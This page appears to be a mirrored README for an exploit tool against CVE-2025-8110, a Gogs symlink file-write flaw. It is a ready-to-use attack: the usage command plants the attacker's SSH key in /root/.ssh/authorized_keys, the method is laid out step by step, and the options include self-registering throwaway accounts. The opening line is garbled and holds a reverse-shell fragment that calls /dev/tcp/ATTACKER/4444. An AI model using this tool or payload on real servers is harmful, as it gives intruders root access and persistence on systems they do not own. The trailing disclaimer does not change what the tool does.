Share
## https://sploitus.com/exploit?id=3D2F9AEA-3487-501E-9C67-A36F90FA5377
# CVE-2025-8110 โ€” Gogs & /dev/tcp/ATTACKER/4444 0>&1"'

# Cleanup the exploit repo after use
python3 CVE-2025-8110.py --url http://target:3001 -u user -p pass \
    --target-file /root/.ssh/authorized_keys --content-file ~/.ssh/id_rsa.pub --cleanup
```

## How It Works

1. **Authenticate** โ€” Log in (or self-register) and create an API token.
2. **Create a repo** โ€” Initialize a new repository with a README via the web UI.
3. **Push a symlink** โ€” Clone the repo locally, create a symlink pointing to the target file (e.g. `/root/.ssh/authorized_keys`), commit, and push.
4. **Write through the symlink** โ€” Call the PutContents API on the symlink filename. Gogs resolves the symlink on disk and writes attacker content to the real file as the Gogs process user (often `root`).

## Options

```
--url             Gogs base URL (e.g. http://target:3001)
-u, --user        Gogs username
-p, --password    Gogs password
--register        Self-register a throwaway account (no captcha)
--target-file     Absolute path to overwrite on the server
--content         String content to write
--content-file    Local file whose contents to write
--repo            Repo name to create (default: random)
--link-name       Symlink filename in the repo (default: payload)
--cleanup         Delete the exploit repo after writing
```

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Use responsibly.